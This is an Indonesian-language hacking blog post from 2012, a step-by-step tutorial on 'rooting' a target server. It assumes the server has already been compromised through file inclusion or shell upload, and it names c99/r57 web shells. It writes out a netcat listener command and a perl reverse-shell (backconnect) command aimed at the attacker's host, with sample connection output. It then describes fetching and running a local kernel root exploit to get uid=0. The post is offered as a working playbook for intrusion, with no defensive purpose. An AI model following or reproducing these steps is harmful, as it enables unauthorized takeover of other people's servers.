Monday, 5 November 2012
Cara ngeROOT Suatu Target
Labels:
Hack
Rootmerupakan akses level tertinggi dalam UNIX, Supaya
kita bisa melakukan hal yang lebih banyak di server target.
Langkah untuk ngeroot
adalah:
1.
Sediakan server / pc
untuk menjalankan aktifitas ngeroot
2.
Sediakan target yang
sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
3.
Sedikan juga shell
injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk
backconnect / sediakan & gunakan perl backconnect tools
4.
Sediakan Netcat (NC)
untuk menerima connection dari backconnect
5.
Sediakan local root
exploit yang sesuai dengan kernel target
Oke, kita mulai
beraksi
Missal:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT
ANDA: 10000
Langkah pertama cara
ngeroot:
Pastikan bahwa Netcat
sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat
sederhana: netcat -n -l -v -p PORT
Contoh: netcat
-n -l -v -p 10000
otaxatix@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Listening on [any] 10000 …
Langkah kedua cara
ngeroot:
Pastikan bahwa anda
sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas
backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan
perl backconnect tools, anda cukup ketikkan perintah: perl
backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
perl backconnect.txt 100.100.100.100 10000
Langkah ketiga cara
ngeroot:
Tunggulan sampai ada
connection dari server target ke server anda, biasanya akan muncul pesan bahwa
terdapat koneksi ke server anda dari target.
Contoh:
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Langkah ke-empat cara
ngeroot:
Anda sudah terkoneksi
ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda
bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi,
maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak
tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target
adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2,
h0llyshit, prctl untuk exploitnya.
Setelah itu kita wget file raptor atau
bisa juga upload dari local file, kemudian kita tempatkan di yang permissionnya
bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan
perintahnya:
./raptor
w00t: uid=0(root)
gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
selamat mencoba
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment